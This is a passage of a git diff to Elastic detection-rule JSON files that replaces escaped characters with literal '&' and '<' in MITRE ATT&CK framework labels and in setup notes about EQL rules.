"tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/5cd55388-a19c-47c7-8ec4-f41656c2fded_103.json b/packages/security_detection_engine/kibana/security_rule/5cd55388-a19c-47c7-8ec4-f41656c2fded_103.json index 93afdcf5eac..ddaa0cf1800 100644 --- a/packages/security_detection_engine/kibana/security_rule/5cd55388-a19c-47c7-8ec4-f41656c2fded_103.json +++ b/packages/security_detection_engine/kibana/security_rule/5cd55388-a19c-47c7-8ec4-f41656c2fded_103.json @@ -93,7 +93,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/5cd55388-a19c-47c7-8ec4-f41656c2fded_104.json b/packages/security_detection_engine/kibana/security_rule/5cd55388-a19c-47c7-8ec4-f41656c2fded_104.json index d5ecc9ca498..b947fc1186f 100644 --- a/packages/security_detection_engine/kibana/security_rule/5cd55388-a19c-47c7-8ec4-f41656c2fded_104.json +++ b/packages/security_detection_engine/kibana/security_rule/5cd55388-a19c-47c7-8ec4-f41656c2fded_104.json @@ -94,7 +94,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/5cd55388-a19c-47c7-8ec4-f41656c2fded_105.json b/packages/security_detection_engine/kibana/security_rule/5cd55388-a19c-47c7-8ec4-f41656c2fded_105.json index 64909669e95..3a9eaea9a58 100644 --- a/packages/security_detection_engine/kibana/security_rule/5cd55388-a19c-47c7-8ec4-f41656c2fded_105.json +++ b/packages/security_detection_engine/kibana/security_rule/5cd55388-a19c-47c7-8ec4-f41656c2fded_105.json @@ -94,7 +94,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/5cd8e1f7-0050-4afc-b2df-904e40b2f5ae_105.json b/packages/security_detection_engine/kibana/security_rule/5cd8e1f7-0050-4afc-b2df-904e40b2f5ae_105.json index 4d5a1a0f673..69ed54eae2b 100644 --- a/packages/security_detection_engine/kibana/security_rule/5cd8e1f7-0050-4afc-b2df-904e40b2f5ae_105.json +++ b/packages/security_detection_engine/kibana/security_rule/5cd8e1f7-0050-4afc-b2df-904e40b2f5ae_105.json @@ -48,7 +48,7 @@ ], "risk_score": 47, "rule_id": "5cd8e1f7-0050-4afc-b2df-904e40b2f5ae", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/5cd8e1f7-0050-4afc-b2df-904e40b2f5ae_106.json b/packages/security_detection_engine/kibana/security_rule/5cd8e1f7-0050-4afc-b2df-904e40b2f5ae_106.json index 30873ad39c1..201447c0c7e 100644 --- a/packages/security_detection_engine/kibana/security_rule/5cd8e1f7-0050-4afc-b2df-904e40b2f5ae_106.json +++ b/packages/security_detection_engine/kibana/security_rule/5cd8e1f7-0050-4afc-b2df-904e40b2f5ae_106.json @@ -48,7 +48,7 @@ ], "risk_score": 47, "rule_id": "5cd8e1f7-0050-4afc-b2df-904e40b2f5ae", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/5cd8e1f7-0050-4afc-b2df-904e40b2f5ae_107.json b/packages/security_detection_engine/kibana/security_rule/5cd8e1f7-0050-4afc-b2df-904e40b2f5ae_107.json index 87c5669f3f0..b7ec60004fa 100644 --- a/packages/security_detection_engine/kibana/security_rule/5cd8e1f7-0050-4afc-b2df-904e40b2f5ae_107.json +++ b/packages/security_detection_engine/kibana/security_rule/5cd8e1f7-0050-4afc-b2df-904e40b2f5ae_107.json @@ -48,7 +48,7 @@ ], "risk_score": 47, "rule_id": "5cd8e1f7-0050-4afc-b2df-904e40b2f5ae", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/5cd8e1f7-0050-4afc-b2df-904e40b2f5ae_108.json b/packages/security_detection_engine/kibana/security_rule/5cd8e1f7-0050-4afc-b2df-904e40b2f5ae_108.json index 38c7abef477..5d6489c5e51 100644 --- a/packages/security_detection_engine/kibana/security_rule/5cd8e1f7-0050-4afc-b2df-904e40b2f5ae_108.json +++ b/packages/security_detection_engine/kibana/security_rule/5cd8e1f7-0050-4afc-b2df-904e40b2f5ae_108.json @@ -48,7 +48,7 @@ ], "risk_score": 47, "rule_id": "5cd8e1f7-0050-4afc-b2df-904e40b2f5ae", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/5cf6397e-eb91-4f31-8951-9f0eaa755a31_3.json b/packages/security_detection_engine/kibana/security_rule/5cf6397e-eb91-4f31-8951-9f0eaa755a31_3.json index 0ad2e318388..b26bfa7dd0e 100644 --- a/packages/security_detection_engine/kibana/security_rule/5cf6397e-eb91-4f31-8951-9f0eaa755a31_3.json +++ b/packages/security_detection_engine/kibana/security_rule/5cf6397e-eb91-4f31-8951-9f0eaa755a31_3.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/5cf6397e-eb91-4f31-8951-9f0eaa755a31_4.json b/packages/security_detection_engine/kibana/security_rule/5cf6397e-eb91-4f31-8951-9f0eaa755a31_4.json index db58d6b5738..ede054c2114 100644 --- a/packages/security_detection_engine/kibana/security_rule/5cf6397e-eb91-4f31-8951-9f0eaa755a31_4.json +++ b/packages/security_detection_engine/kibana/security_rule/5cf6397e-eb91-4f31-8951-9f0eaa755a31_4.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/5cf6397e-eb91-4f31-8951-9f0eaa755a31_5.json b/packages/security_detection_engine/kibana/security_rule/5cf6397e-eb91-4f31-8951-9f0eaa755a31_5.json index 048b2aae931..21d719339a8 100644 --- a/packages/security_detection_engine/kibana/security_rule/5cf6397e-eb91-4f31-8951-9f0eaa755a31_5.json +++ b/packages/security_detection_engine/kibana/security_rule/5cf6397e-eb91-4f31-8951-9f0eaa755a31_5.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/5cf6397e-eb91-4f31-8951-9f0eaa755a31_6.json b/packages/security_detection_engine/kibana/security_rule/5cf6397e-eb91-4f31-8951-9f0eaa755a31_6.json index c5186ea4f45..979c5684960 100644 --- a/packages/security_detection_engine/kibana/security_rule/5cf6397e-eb91-4f31-8951-9f0eaa755a31_6.json +++ b/packages/security_detection_engine/kibana/security_rule/5cf6397e-eb91-4f31-8951-9f0eaa755a31_6.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -87,7 +87,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/5d0265bf-dea9-41a9-92ad-48a8dcd05080_102.json b/packages/security_detection_engine/kibana/security_rule/5d0265bf-dea9-41a9-92ad-48a8dcd05080_102.json index e72753c8eb3..63d73034927 100644 --- a/packages/security_detection_engine/kibana/security_rule/5d0265bf-dea9-41a9-92ad-48a8dcd05080_102.json +++ b/packages/security_detection_engine/kibana/security_rule/5d0265bf-dea9-41a9-92ad-48a8dcd05080_102.json @@ -48,7 +48,7 @@ ], "risk_score": 47, "rule_id": "5d0265bf-dea9-41a9-92ad-48a8dcd05080", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/5d0265bf-dea9-41a9-92ad-48a8dcd05080_103.json b/packages/security_detection_engine/kibana/security_rule/5d0265bf-dea9-41a9-92ad-48a8dcd05080_103.json index 5d7238aa134..c1d241886d9 100644 --- a/packages/security_detection_engine/kibana/security_rule/5d0265bf-dea9-41a9-92ad-48a8dcd05080_103.json +++ b/packages/security_detection_engine/kibana/security_rule/5d0265bf-dea9-41a9-92ad-48a8dcd05080_103.json @@ -48,7 +48,7 @@ ], "risk_score": 47, "rule_id": "5d0265bf-dea9-41a9-92ad-48a8dcd05080", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/5d0265bf-dea9-41a9-92ad-48a8dcd05080_104.json b/packages/security_detection_engine/kibana/security_rule/5d0265bf-dea9-41a9-92ad-48a8dcd05080_104.json index ae329371dc2..5d94125d9d6 100644 --- a/packages/security_detection_engine/kibana/security_rule/5d0265bf-dea9-41a9-92ad-48a8dcd05080_104.json +++ b/packages/security_detection_engine/kibana/security_rule/5d0265bf-dea9-41a9-92ad-48a8dcd05080_104.json @@ -48,7 +48,7 @@ ], "risk_score": 47, "rule_id": "5d0265bf-dea9-41a9-92ad-48a8dcd05080", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/5d0265bf-dea9-41a9-92ad-48a8dcd05080_105.json b/packages/security_detection_engine/kibana/security_rule/5d0265bf-dea9-41a9-92ad-48a8dcd05080_105.json index d91054a1a42..0091a86a411 100644 --- a/packages/security_detection_engine/kibana/security_rule/5d0265bf-dea9-41a9-92ad-48a8dcd05080_105.json +++ b/packages/security_detection_engine/kibana/security_rule/5d0265bf-dea9-41a9-92ad-48a8dcd05080_105.json @@ -47,7 +47,7 @@ ], "risk_score": 47, "rule_id": "5d0265bf-dea9-41a9-92ad-48a8dcd05080", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/5d0265bf-dea9-41a9-92ad-48a8dcd05080_106.json b/packages/security_detection_engine/kibana/security_rule/5d0265bf-dea9-41a9-92ad-48a8dcd05080_106.json index 28b2c530181..40c71621899 100644 --- a/packages/security_detection_engine/kibana/security_rule/5d0265bf-dea9-41a9-92ad-48a8dcd05080_106.json +++ b/packages/security_detection_engine/kibana/security_rule/5d0265bf-dea9-41a9-92ad-48a8dcd05080_106.json @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/5d1d6907-0747-4d5d-9b24-e4a18853dc0a_102.json b/packages/security_detection_engine/kibana/security_rule/5d1d6907-0747-4d5d-9b24-e4a18853dc0a_102.json index 9aa6f4af9f4..8d061a20c02 100644 --- a/packages/security_detection_engine/kibana/security_rule/5d1d6907-0747-4d5d-9b24-e4a18853dc0a_102.json +++ b/packages/security_detection_engine/kibana/security_rule/5d1d6907-0747-4d5d-9b24-e4a18853dc0a_102.json @@ -77,7 +77,7 @@ ], "risk_score": 47, "rule_id": "5d1d6907-0747-4d5d-9b24-e4a18853dc0a", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -88,7 +88,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/5d1d6907-0747-4d5d-9b24-e4a18853dc0a_103.json b/packages/security_detection_engine/kibana/security_rule/5d1d6907-0747-4d5d-9b24-e4a18853dc0a_103.json index 1c618a3e54b..8ffb19e92c8 100644 --- a/packages/security_detection_engine/kibana/security_rule/5d1d6907-0747-4d5d-9b24-e4a18853dc0a_103.json +++ b/packages/security_detection_engine/kibana/security_rule/5d1d6907-0747-4d5d-9b24-e4a18853dc0a_103.json @@ -77,7 +77,7 @@ ], "risk_score": 47, "rule_id": "5d1d6907-0747-4d5d-9b24-e4a18853dc0a", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -87,7 +87,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/5d1d6907-0747-4d5d-9b24-e4a18853dc0a_104.json b/packages/security_detection_engine/kibana/security_rule/5d1d6907-0747-4d5d-9b24-e4a18853dc0a_104.json index 554419804e5..4e5e40bc855 100644 --- a/packages/security_detection_engine/kibana/security_rule/5d1d6907-0747-4d5d-9b24-e4a18853dc0a_104.json +++ b/packages/security_detection_engine/kibana/security_rule/5d1d6907-0747-4d5d-9b24-e4a18853dc0a_104.json @@ -77,7 +77,7 @@ ], "risk_score": 47, "rule_id": "5d1d6907-0747-4d5d-9b24-e4a18853dc0a", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -88,7 +88,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/5d1d6907-0747-4d5d-9b24-e4a18853dc0a_105.json b/packages/security_detection_engine/kibana/security_rule/5d1d6907-0747-4d5d-9b24-e4a18853dc0a_105.json index d7650c0b7dc..386fac7c881 100644 --- a/packages/security_detection_engine/kibana/security_rule/5d1d6907-0747-4d5d-9b24-e4a18853dc0a_105.json +++ b/packages/security_detection_engine/kibana/security_rule/5d1d6907-0747-4d5d-9b24-e4a18853dc0a_105.json @@ -77,7 +77,7 @@ ], "risk_score": 47, "rule_id": "5d1d6907-0747-4d5d-9b24-e4a18853dc0a", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -89,7 +89,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -111,7 +111,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/5d1d6907-0747-4d5d-9b24-e4a18853dc0a_106.json b/packages/security_detection_engine/kibana/security_rule/5d1d6907-0747-4d5d-9b24-e4a18853dc0a_106.json index 52b4d648768..9e71f868a37 100644 --- a/packages/security_detection_engine/kibana/security_rule/5d1d6907-0747-4d5d-9b24-e4a18853dc0a_106.json +++ b/packages/security_detection_engine/kibana/security_rule/5d1d6907-0747-4d5d-9b24-e4a18853dc0a_106.json @@ -76,7 +76,7 @@ ], "risk_score": 47, "rule_id": "5d1d6907-0747-4d5d-9b24-e4a18853dc0a", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -88,7 +88,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -110,7 +110,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/5d9f8cfc-0d03-443e-a167-2b0597ce0965_102.json b/packages/security_detection_engine/kibana/security_rule/5d9f8cfc-0d03-443e-a167-2b0597ce0965_102.json index ef56b2b8d56..690ef0cd46b 100644 --- a/packages/security_detection_engine/kibana/security_rule/5d9f8cfc-0d03-443e-a167-2b0597ce0965_102.json +++ b/packages/security_detection_engine/kibana/security_rule/5d9f8cfc-0d03-443e-a167-2b0597ce0965_102.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/5d9f8cfc-0d03-443e-a167-2b0597ce0965_103.json b/packages/security_detection_engine/kibana/security_rule/5d9f8cfc-0d03-443e-a167-2b0597ce0965_103.json index 55ebf56746d..dcc039f7a85 100644 --- a/packages/security_detection_engine/kibana/security_rule/5d9f8cfc-0d03-443e-a167-2b0597ce0965_103.json +++ b/packages/security_detection_engine/kibana/security_rule/5d9f8cfc-0d03-443e-a167-2b0597ce0965_103.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/5d9f8cfc-0d03-443e-a167-2b0597ce0965_104.json b/packages/security_detection_engine/kibana/security_rule/5d9f8cfc-0d03-443e-a167-2b0597ce0965_104.json index 315f367141f..63b7c40cedb 100644 --- a/packages/security_detection_engine/kibana/security_rule/5d9f8cfc-0d03-443e-a167-2b0597ce0965_104.json +++ b/packages/security_detection_engine/kibana/security_rule/5d9f8cfc-0d03-443e-a167-2b0597ce0965_104.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/5d9f8cfc-0d03-443e-a167-2b0597ce0965_105.json b/packages/security_detection_engine/kibana/security_rule/5d9f8cfc-0d03-443e-a167-2b0597ce0965_105.json index 749bb9e6c43..8771e34637f 100644 --- a/packages/security_detection_engine/kibana/security_rule/5d9f8cfc-0d03-443e-a167-2b0597ce0965_105.json +++ b/packages/security_detection_engine/kibana/security_rule/5d9f8cfc-0d03-443e-a167-2b0597ce0965_105.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/5e161522-2545-11ed-ac47-f661ea17fbce_104.json b/packages/security_detection_engine/kibana/security_rule/5e161522-2545-11ed-ac47-f661ea17fbce_104.json index 9bf1b41d9dc..6e5269b52ea 100644 --- a/packages/security_detection_engine/kibana/security_rule/5e161522-2545-11ed-ac47-f661ea17fbce_104.json +++ b/packages/security_detection_engine/kibana/security_rule/5e161522-2545-11ed-ac47-f661ea17fbce_104.json @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/5e161522-2545-11ed-ac47-f661ea17fbce_105.json b/packages/security_detection_engine/kibana/security_rule/5e161522-2545-11ed-ac47-f661ea17fbce_105.json index 91a3e9f487f..107f6f387a4 100644 --- a/packages/security_detection_engine/kibana/security_rule/5e161522-2545-11ed-ac47-f661ea17fbce_105.json +++ b/packages/security_detection_engine/kibana/security_rule/5e161522-2545-11ed-ac47-f661ea17fbce_105.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/5e161522-2545-11ed-ac47-f661ea17fbce_106.json b/packages/security_detection_engine/kibana/security_rule/5e161522-2545-11ed-ac47-f661ea17fbce_106.json index 6da188c311e..7ab58868827 100644 --- a/packages/security_detection_engine/kibana/security_rule/5e161522-2545-11ed-ac47-f661ea17fbce_106.json +++ b/packages/security_detection_engine/kibana/security_rule/5e161522-2545-11ed-ac47-f661ea17fbce_106.json @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/5e552599-ddec-4e14-bad1-28aa42404388_101.json b/packages/security_detection_engine/kibana/security_rule/5e552599-ddec-4e14-bad1-28aa42404388_101.json index 98b8e2ba8f2..1873eb5f885 100644 --- a/packages/security_detection_engine/kibana/security_rule/5e552599-ddec-4e14-bad1-28aa42404388_101.json +++ b/packages/security_detection_engine/kibana/security_rule/5e552599-ddec-4e14-bad1-28aa42404388_101.json @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/5e552599-ddec-4e14-bad1-28aa42404388_102.json b/packages/security_detection_engine/kibana/security_rule/5e552599-ddec-4e14-bad1-28aa42404388_102.json index 94d39af72c5..6f1f31eda7d 100644 --- a/packages/security_detection_engine/kibana/security_rule/5e552599-ddec-4e14-bad1-28aa42404388_102.json +++ b/packages/security_detection_engine/kibana/security_rule/5e552599-ddec-4e14-bad1-28aa42404388_102.json @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/60884af6-f553-4a6c-af13-300047455491_101.json b/packages/security_detection_engine/kibana/security_rule/60884af6-f553-4a6c-af13-300047455491_101.json index 4c6ee3b41b5..176b3acbd17 100644 --- a/packages/security_detection_engine/kibana/security_rule/60884af6-f553-4a6c-af13-300047455491_101.json +++ b/packages/security_detection_engine/kibana/security_rule/60884af6-f553-4a6c-af13-300047455491_101.json @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/60884af6-f553-4a6c-af13-300047455491_102.json b/packages/security_detection_engine/kibana/security_rule/60884af6-f553-4a6c-af13-300047455491_102.json index 8af9cfeef7c..e59bbd48e4d 100644 --- 